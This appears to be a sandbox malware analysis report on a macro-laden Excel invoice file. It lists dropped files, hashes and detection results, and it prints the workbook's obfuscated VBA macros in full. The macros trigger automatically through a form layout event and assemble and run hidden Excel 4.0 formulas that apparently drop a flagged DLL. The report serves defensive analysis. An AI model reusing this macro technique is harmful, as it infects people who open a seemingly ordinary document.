MD5:	D31AAE35E4371A0F24FFAEE8B0B3FE31
SHA1:	50E1D0505DFAE23EEEADC3A3818306F7E28FE8EA
SHA-256:	E64A445B442AC69758162DBA057BB794BCF8B9C10A6737833EBF262C5B2FA616
SHA-512:	5B234DA5A15109B748CBE347FB93FE9CEF0D1C503D9C5CE3AC27356419CF5442C4259EECA34497C22A6E668923C9BE7D73F8FF3F046CBECC9497D25FC6CE2059
Malicious:	false
Preview:	MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0......*..\+...+..$,...,...,..P-...-......\|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................

C:\Users\user\AppData\Local\Temp\Tar4961.tmp Download File
Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	data
Category:	modified
Size (bytes):	152533
Entropy (8bit):	6.31602258454967
Encrypted:	false
SSDEEP:	1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
MD5:	D0682A3C344DFC62FB18D5A539F81F61
SHA1:	09D3E9B899785DA377DF2518C6175D70CCF9DA33
SHA-256:	4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
SHA-512:	0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
Malicious:	false
Preview:	0..S....H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Local\Temp\WER1CC5.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\System32\DWWIN.EXE
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	3110
Entropy (8bit):	3.6802026008202917
Encrypted:	false
SSDEEP:	96:Shz4tU6o7VxBt3uhhgHPe40PAn5xp3ZH3:Wl7LBNuhhgG45nv5p
MD5:	1269CD12A180DB40A0EDDB1DF04E9F01
SHA1:	1DDFD166A6A4223135C99742BB63E7A2EF93D5FF
SHA-256:	FEB2AF5FB4B9E72EB40A7748EC8B15181928CB278A4CFE9747645D9F8E3D90CD
SHA-512:	58BED2B42381F7459BA5EB29A2567EC632AD816D13F042AA97AC1E722B1BEBFB09C52C05D1E660EC7E62D7613A70B163D7494B208F6FDAD31FB45572D2B64DE6
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.6...1.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.7.6.0.1. .S.e.r.v.i.c.e. .P.a.c.k. .1.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .7. .P.r.o.f.e.s.s.i.o.n.a.l.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.7.6.0.1...2.3.6.7.7...a.m.d.6.4.f.r.e...w.i.n.7.s.p.1._.l.d.r...1.7.0.2.0.9.-.0.6.0.0.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.3.0.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.a.r.e.n.t.P.r.o.c.e.s.s.I.

C:\Users\user\AppData\Local\Temp\deibsjhv.dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	318976
Entropy (8bit):	7.117716571043564
Encrypted:	false
SSDEEP:	6144:CH9O040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwN:+9O02Srnh0qEJC+Y218jdN
MD5:	153526D29EC2007BAB82E802476A4DE8
SHA1:	6AD4255289C294C1FB40D9B016BF9A3910ACD2D7
SHA-256:	960A1E2B0409907409403684B842DDCCC1BB3369EFAF5881FEA9D1DA51599717
SHA-512:	87CC56F173494817BC097959D6288880971045DF3BE3C881F62DD72C045EFA55A974FA2A6538518E62487374ABDC060585FC32C53565BE686516DEF39BBADC7E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 33%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Qf._...........!...2.z...`.......&.......@...............................@..........................................................\|....................0..(....................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2......p.......2..............@..@.data...H............4..............@....text4...R.......T...P.............. ..@.rsrc...\|........0..................@..@.reloc..(....0......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Excel\~ar5F23.xar Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	modified
Size (bytes):	52921
Entropy (8bit):	7.83121375225877
Encrypted:	false
SSDEEP:	768:7RYYsm84gDXB7UG65JjGUgpq9NxiY+K0/uH8n9QjU205LEd29WNJ4UDTQh4cR:G4Y7UjB4qbF+/28nv5LkJ4UDTQh4cR
MD5:	B6401224778682FB72465C74F3CAD6EC
SHA1:	6EC0AA81C2866096603884461A986DC04E9D70B5
SHA-256:	1AA64193AC4D646A2A7890F2765966DC765180F7099043924544E93328F9446E
SHA-512:	CD9F6C8883B98C1B330BB554AF2469C4C8BD9F5DCEC6574DBEC583061D35610D41F52397BF466BAA0FE8BBA46AD0A892FAFF733BFEC2ACAE10F2A05BE06965AA
Malicious:	false
Preview:	.V...0..W.? ..v....B...J=.].[.W...w.m.^..}.@......%..{o<o<...UR....<].U...FH.......i...).!O......7..... Z.<=.`?R...J..q.0.d.o.Z......j..r....n77P.G........N.O.{QO..Jr.0PZiAJ.A.A........I.3.....+.Y. .....,c\|..0..b.Qgqe..@......\e...Ad.U....d.(..<..I\.o/0S...0..D...o.{.2..}..rR@r.\..J...6f4.x.\...x.\|}F.hK...P/.B\...'...{x.VN.y.......<.@..5....e...+..../q.EL..:........=...q....u.D.w.H...].....L...........x.....u.,6.....T.....s.1ai.cw........1n.Hl=.C..O..&EDg......Y1t.O.8....&..a-@.h...`........PK..........!...>,....].......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Mon Jan 11 23:51:47 2021, atime=Mon Jan 11 23:51:47 2021, length=8192, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.483328508471103
Encrypted:	false
SSDEEP:	12:85QpepCLgXg/XAlCPCHaXgzB8IB/0PJX+WnicvblubDtZ3YilMMEpxRljKlcTdJU:85BpU/XTwz6IWRYeYDv3qEwrNru/
MD5:	FA174A06993AAC0993BCB16D579DAA4C
SHA1:	94A542664EB3362E5C6B3B8D2882AA3998DBBF56
SHA-256:	7E3ACFC3D4B7229A8194D15EEFD41A1CDAC1399BC5DA019F30BFD40632473C2B
SHA-512:	DC172C7E352246945EEEBF582E8C20AAEFC894FE504F2CC141F5511A89BAC401B577379726CC519082990BC23BEDAC65F55F3E9AC9889F1D3415737883F0E449
Malicious:	false
Preview:	L..................F...........7G....1.}.....1.}.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1.....,Rx...Desktop.d......QK.X,Rx...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\226533\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......226533..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\INV9698791470-20210111920647.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Mon Jan 11 23:51:47 2021, atime=Mon Jan 11 23:51:56 2021, length=58673, window=hide
Category:	dropped
Size (bytes):	2218
Entropy (8bit):	4.493516785145665
Encrypted:	false
SSDEEP:	48:8Bk/XT3IkHUeoLEwQh2Bk/XT3IkHUeoLEwQ/:8Bk/XLIkEXQh2Bk/XLIkEXQ/
MD5:	3C032ED4207ABCC77992C6F450C90FE1
SHA1:	14DE153123668A2AD2FB1868673AC0E648B67E5A
SHA-256:	61D3AE7D3794900E686DD93838B275A8DD12708A70FB702EE6DD82663CB4B648
SHA-512:	994B24EE0B175B9B8E552B518262B25254F0A60E5F5670B3496F4007D202D8758178EEF86CB071AC916B1F8BE26D1004DF26058D518F7B2FC3E440579BDFA5E3
Malicious:	false
Preview:	L..................F.... ....mC..{....1.}...... }...1............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.L...,Rr. .INV969~1.XLS..p.......Q.y.Q.y...8.....................I.N.V.9.6.9.8.7.9.1.4.7.0.-.2.0.2.1.0.1.1.1.9.2.0.6.4.7...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\226533\Users.user\Desktop\INV9698791470-20210111920647.xlsm.8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.N.V.9.6.9.8.7.9.1.4.7.0.-.2.0.2.1.0.1.1.1.9.2.0.6.4.7...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	139
Entropy (8bit):	4.456016029908605
Encrypted:	false
SSDEEP:	3:oyBVomxWnnRI/dcXVdiul0RI/dcXVdiulmxWnnRI/dcXVdiulv:djUnC2iuL2iu5nC2iu1
MD5:	50428352EF301BA109C7B0F436800B73
SHA1:	54DA02692D2DAB5B14156F00211C03C25FCBED30
SHA-256:	ECCC423CF786F2C92FF9709A6BF5C3011E246729FD442432793A20A8B9035A67
SHA-512:	D4B8814FCEC9891D32ECC1DD0C8FAAF3F634CE31E9E57526C59ADE47ACAFEC019C6C4DE299E09A3EDB53729DC57F6C2831909D64BBC8D12F7EF0C0F7E84E1057
Malicious:	false
Preview:	Desktop.LNK=0..[misc]..INV9698791470-20210111920647.LNK=0..INV9698791470-20210111920647.LNK=0..[misc]..INV9698791470-20210111920647.LNK=0..

C:\Users\user\Desktop\94FE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	58673
Entropy (8bit):	7.858877245262675
Encrypted:	false
SSDEEP:	1536:hpnu8RzggbLmCf6646CIKRVUzFg+CIDUPmBZGgGXIjlPsLNFqZ0K:hp1rmCM2xzFg+HDUOPnZ+I0K
MD5:	541D9D55183F46F2C29A23CC56E8725C
SHA1:	84BC04B807D053CB18C1A02A4488562FE9B71BDC
SHA-256:	983C02A70488E1CE72D8D4CAAC9E8DBC9DB5BE0454B38F507FAA9CCFB28D6021
SHA-512:	96CFD1D233FE0A30D4155830693E4D1DF358D163F3686EB4AA9208BD502848A3CE036DB927812C77C60F28925C1F79CE98133048CFE103E783D6DD902C9BADB3
Malicious:	false
Preview:	...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......\|_;.....W>~......x..u.n.....+.....(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.\|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$INV9698791470-20210111920647.xlsm Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.77272893585129
TrID:	Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50% Excel Microsoft Office Open XML Format document (40004/1) 37.92% ZIP compressed archive (8000/1) 7.58%
File name:	INV9698791470-20210111920647.xlsm
File size:	42039
MD5:	9b7c2b0abf5478ef9a23d9a9e87c7835
SHA1:	6931c4b845a8a952699d9cf85b316e3b3d826a41
SHA256:	a463f9a8842a5c947abaa2bff1b621835ff35f65f9d3272bf1fa5197df9f07d0
SHA512:	4c92f1fdbd83eb8e38e93800d2620c328ac59de4d5cdef9e8fbbcfc02fe715f110db49a83880ef0726fb1224d140472abf341b22fa7710710a69f061aa880840
SSDEEP:	768:IHT0FIYwYlKUOaSqlRgzxTLKLls5QlHbdYoVq+:uYwQKUOVqlRgzxTOLpZYAq+
File Content Preview:	PK..........!.o.m.....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4bcbcac

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	2

OLE File "/opt/package/joesandbox/database/analysis/338095/sample/INV9698791470-20210111920647.xlsm"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Author:
Last Saved By:
Create Time:	2020-12-07T14:38:21Z
Last Saved Time:	2021-01-11T14:32:26Z
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	16.0300

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 3215

General
Stream Path:	VBA/Module1
VBA File Name:	Module1.bas
Stream Size:	3215
Data ASCII:	. . . . . . . . . * . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . x . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 03 f0 00 00 00 2a 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 58 05 00 00 f0 09 00 00 00 00 00 00 01 00 00 00 ba 78 ca 26 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Integer:
bycilke()
VB_Name
MiV(sem.value)
homepodd()
homepodd
Error
Integer)
bycilke
Function
ol).Name
"!"):
String
"ab":
Split(govs,
Randomize:
yellowsto(yel
Next:
ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
yellowsto(Oa))))
Integer
yellowsto
ol).value
nimo(Int((UBound(nimo)
Replace(Vo,
Chr(sem.Row)
Sheets(ol).Cells(homepodd,
"ab"))
Split(kij(ol),
yellowsto(homepodd))
Rnd))
(Run(""
"moreP_"
Variant)
Attribute
Resume
pagesREviewsd(Optional
ecimovert(nimo
ecimovert
MsgBox

VBA Code

Attribute VB_Name = "Module1"

Function homepodd()
homepodd = 5 - 3
End Function

Function pagesREviewsd(Optional wq As Integer) As Integer
Dim O As Integer: Dim Oa As Integer: ol = 1
Sheets(ol).Cells(homepodd, ol).Name = bycilke & "ab":
Dim MiV(44563)
For Each sem In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
MiV(sem.value) = Chr(sem.Row)
Next
For Each nog In MiV
govs = govs + nog
Next
Oa = 9: kij = Split(govs, "!"): Ada = Split(kij(ol), yellowsto(homepodd))
For Each Vo In Ada
Sheets(ol).Cells(homepodd, ol).value = "=" & Replace(Vo, "?", ecimovert(Split(kij(0), yellowsto(Oa))))
On Error Resume Next:
MsgBox (Run("" & bycilke & "ab"))
Next: Oa = 2:
End Function
Function bycilke()
bycilke = "moreP_"
End Function
Function ecimovert(nimo As Variant) As String
Randomize: df = 2 - 1: ecimovert = nimo(Int((UBound(nimo) + df) * Rnd))
End Function



Function yellowsto(yel As Integer)
yellowsto = "$"
If yel = 2 Then yellowsto = "]"
End Function

VBA File Name: Sheet1.cls, Stream Size: 1639

General
Stream Path:	VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	1639
Data ASCII:	. . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . x . k . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . " . v i e w _ 1 _ a , 1 , 0 , M S F o r m s , M u l t i P a g e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . .
Data Raw:	01 16 03 00 00 16 01 00 00 c8 03 00 00 fa 00 00 00 26 02 00 00 ff ff ff ff cf 03 00 00 fb 04 00 00 00 00 00 00 01 00 00 00 ba 78 c2 6b 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Index
VB_Name
VB_Creatable
Application.OnTime
VB_Exposed
Long)
ResizePagess()
VB_Customizable
"REviewsd"
VB_Control
MultiPage"
VB_TemplateDerived
MSForms,
False
Attribute
Private
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
ResizePagess
"pages"

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "view_1_a, 1, 0, MSForms, MultiPage"
Sub ResizePagess()
Application.OnTime Now, "pages" & "REviewsd"
End Sub
Private Sub view_1_a_Layout(ByVal Index As Long)
a = 488: ResizePagess
End Sub

VBA File Name: ThisWorkbook.cls, Stream Size: 999

General
Stream Path:	VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	999
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . x . d . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 ba 78 1c 64 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
"ThisWorkbook"
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 550

General
Stream Path:	PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	550
Entropy:	5.28107922141
Base64 Encoded:	True
Data ASCII:	I D = " { 4 9 3 4 E D C 8 - 1 B 9 3 - 4 5 B C - B 6 9 0 - D B B 2 9 D 5 C 1 4 7 3 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E E E C 1 D 3 1 E 5 F 1 D 7 F 5 D 7 F 5 D 7 F 5 D 7 F 5 " . . D P B = " D C D E 2 F 3 F F 3 2 C F 4 2 C F 4 2 C "
Data Raw:	49 44 3d 22 7b 34 39 33 34 45 44 43 38 2d 31 42 39 33 2d 34 35 42 43 2d 42 36 39 30 2d 44 42 42 32 39 44 35 43 31 34 37 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d

Stream Path: PROJECTwm, File Type: data, Stream Size: 86

General
Stream Path:	PROJECTwm
File Type:	data
Stream Size:	86
Entropy:	3.24455457963
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00

Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3574

General
Stream Path:	VBA/_VBA_PROJECT
File Type:	data
Stream Size:	3574
Entropy:	4.45079869926
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:	cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2060

General
Stream Path:	VBA/__SRP_0
File Type:	data
Stream Size:	2060
Entropy:	3.45011283232
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . Y . n . M . . . W . . v _ . . . . . . . .
